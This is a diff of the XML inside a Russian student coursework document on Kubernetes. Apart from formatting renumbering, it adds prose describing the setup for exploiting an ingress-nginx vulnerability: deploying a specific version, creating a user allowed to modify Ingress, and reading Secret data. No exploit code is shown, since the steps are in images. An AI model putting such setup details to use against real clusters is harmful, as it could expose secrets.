+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="25D80E03"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="281E8F86"/>
@@ -6775,7 +7204,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2B897451"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2236DD4C"/>
@@ -6861,7 +7290,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="31F364F3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="337C7BBC"/>
@@ -6974,7 +7403,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36103255"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0D20E014"/>
@@ -7087,7 +7516,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="37615467"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="433A8DE2"/>
@@ -7173,7 +7602,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BF57415"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="41DE3C32"/>
@@ -7260,7 +7689,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3CBE06EA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF94C328"/>
@@ -7373,7 +7802,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="432642D1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CF964D6A"/>
@@ -7485,7 +7914,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4B3C7C08"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="33F806F6"/>
@@ -7607,7 +8036,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4FC04CB4"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0CC648DC"/>
@@ -7693,7 +8122,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="540D3D75"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8D324CCE"/>
@@ -7779,7 +8208,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="55556929"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="133C48D4"/>
@@ -7928,7 +8357,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5724380D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="72C8C996"/>
@@ -8014,7 +8443,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5D067962"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8D324CCE"/>
@@ -8100,7 +8529,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5FDF2CBB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="411074C6"/>
@@ -8186,14 +8615,14 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="63C83F5B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="98CEC5C4"/>
-    <w:lvl w:ilvl="0" w:tplc="43E86638">
+    <w:tmpl w:val="B484A688"/>
+    <w:lvl w:ilvl="0" w:tplc="5F18B3EA">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="-"/>
+      <w:pStyle w:val="-0"/>
       <w:lvlText w:val="Таблица %1 -"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
@@ -8276,14 +8705,14 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="68916177"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C9C8A6EA"/>
     <w:lvl w:ilvl="0" w:tplc="F6441E36">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="-0"/>
+      <w:pStyle w:val="-1"/>
       <w:lvlText w:val="%1)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
@@ -8363,7 +8792,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="71B737AF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CB4243CE"/>
@@ -8449,7 +8878,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="75407427"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76A61BE0"/>
@@ -8535,7 +8964,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76B83FF6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2414654C"/>
@@ -8621,7 +9050,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A903472"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D676FBFC"/>
@@ -8710,7 +9139,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7B931382"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="90FC8998"/>
@@ -8827,10 +9256,10 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="249629675">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1178883772">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="120196947">
     <w:abstractNumId w:val="8"/>
@@ -8839,70 +9268,70 @@
     <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1907565833">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1083450351">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1820072790">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="870457253">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="457139138">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="245848710">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="2045128810">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="13" w16cid:durableId="1373268555">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="1413770712">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="932324599">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="1760448808">
+    <w:abstractNumId w:val="27"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="123934881">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="1597443151">
     <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="15" w16cid:durableId="932324599">
-    <w:abstractNumId w:val="23"/>
-  </w:num>
-  <w:num w:numId="16" w16cid:durableId="1760448808">
-    <w:abstractNumId w:val="26"/>
-  </w:num>
-  <w:num w:numId="17" w16cid:durableId="123934881">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
-  <w:num w:numId="18" w16cid:durableId="1597443151">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
   <w:num w:numId="19" w16cid:durableId="976646909">
-    <w:abstractNumId w:val="30"/>
+    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1306201552">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="1257058031">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="22" w16cid:durableId="372195541">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="23" w16cid:durableId="1748989788">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="24" w16cid:durableId="1780373040">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="30"/>
   </w:num>
   <w:num w:numId="25" w16cid:durableId="1449549874">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="26" w16cid:durableId="402526936">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="27" w16cid:durableId="1441687026">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -8932,10 +9361,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="28" w16cid:durableId="1813787601">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="29" w16cid:durableId="993676681">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -8971,7 +9400,7 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="32" w16cid:durableId="598296271">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="33" w16cid:durableId="1896232310">
     <w:abstractNumId w:val="3"/>
@@ -8986,22 +9415,22 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="35" w16cid:durableId="977105911">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="36" w16cid:durableId="1518228335">
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="37" w16cid:durableId="993338923">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="38" w16cid:durableId="527840628">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="39" w16cid:durableId="279655649">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="2"/>
     </w:lvlOverride>
@@ -9031,7 +9460,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="40" w16cid:durableId="1826163918">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="41" w16cid:durableId="1146631872">
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="18"/>
 </w:numbering>
@@ -9647,6 +10079,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -9984,6 +10417,7 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
     <w:name w:val="Рисунок"/>
     <w:basedOn w:val="Normal"/>
+    <w:next w:val="-"/>
     <w:qFormat/>
     <w:rsid w:val="009621CF"/>
     <w:pPr>
@@ -10373,7 +10807,7 @@
       <w:iCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-0">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-1">
     <w:name w:val="список - ЦИФРЫ"/>
     <w:basedOn w:val="ListParagraph"/>
     <w:qFormat/>
@@ -10385,15 +10819,16 @@
       <w:ind w:left="709" w:firstLine="0"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-0">
     <w:name w:val="Подпись - ТАБЛИЦА"/>
     <w:next w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00FF2D6B"/>
+    <w:rsid w:val="006A05EA"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="40"/>
       </w:numPr>
+      <w:ind w:left="567" w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -10401,6 +10836,20 @@
       <w:szCs w:val="48"/>
       <w:lang w:val="en-US"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
+    <w:name w:val="Подпись - РИСУНОК"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="006A05EA"/>
+    <w:pPr>
+      <w:numPr>
+        <w:numId w:val="41"/>
+      </w:numPr>
+      <w:ind w:left="567" w:firstLine="0"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>

--- a/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
+++ b/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
@@ -5135,7 +5135,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>kind</w:t>
+        <w:t>minikube</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, который позволяет создать </w:t>
@@ -5172,10 +5172,10 @@
       </w:pPr>
       <w:r>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12DFA86D" wp14:editId="7D455E98">
-            <wp:extent cx="6480175" cy="1959610"/>
-            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
-            <wp:docPr id="932356244" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B9D8280" wp14:editId="57DCF004">
+            <wp:extent cx="6480175" cy="1605280"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1364619382" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5183,7 +5183,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="932356244" name=""/>
+                    <pic:cNvPr id="1364619382" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5195,7 +5195,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6480175" cy="1959610"/>
+                      <a:ext cx="6480175" cy="1605280"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5219,7 +5219,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>kind</w:t>
+        <w:t>minikube</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -5312,42 +5312,42 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">Для экплуатации уязвимости необходимо развернуть </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">конкретно версии </w:t>
+      </w:r>
+      <w:r>
+        <w:t>1.14.4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Для экплуатации уязвимости необходимо развернуть </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ingress</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nginx</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">конкретно версии </w:t>
-      </w:r>
-      <w:r>
-        <w:t>1.14.4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a"/>
-      </w:pPr>
-      <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F19A54C" wp14:editId="6DF8E017">
             <wp:extent cx="6480175" cy="1371600"/>
@@ -5533,32 +5533,32 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">Для проверки уязвимости данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>были декодированны главным пользователем, имеющим прямой доступ к ним.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Для проверки уязвимости данные </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Secret</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>были декодированны главным пользователем, имеющим прямой доступ к ним.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a"/>
-      </w:pPr>
-      <w:r>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76240210" wp14:editId="20CCB47B">
-            <wp:extent cx="6480175" cy="1450340"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="884838214" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E3F3BC2" wp14:editId="42AA090B">
+            <wp:extent cx="6480175" cy="2506345"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+            <wp:docPr id="1366492572" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5566,7 +5566,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="884838214" name=""/>
+                    <pic:cNvPr id="1366492572" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5578,7 +5578,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6480175" cy="1450340"/>
+                      <a:ext cx="6480175" cy="2506345"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5594,6 +5594,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="-"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Исходные данные </w:t>
@@ -5604,6 +5607,1628 @@
         </w:rPr>
         <w:t>Secret</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Для экплуатации уязвимости необходимо создать пользователя внутри </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который имеет доступ на изменение </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Для этого был создан отдельн</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ый </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>yaml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>файл конфигурации для пользователя</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DB4E8FF" wp14:editId="105B394F">
+            <wp:extent cx="4467849" cy="7401958"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="546066520" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="546066520" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4467849" cy="7401958"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
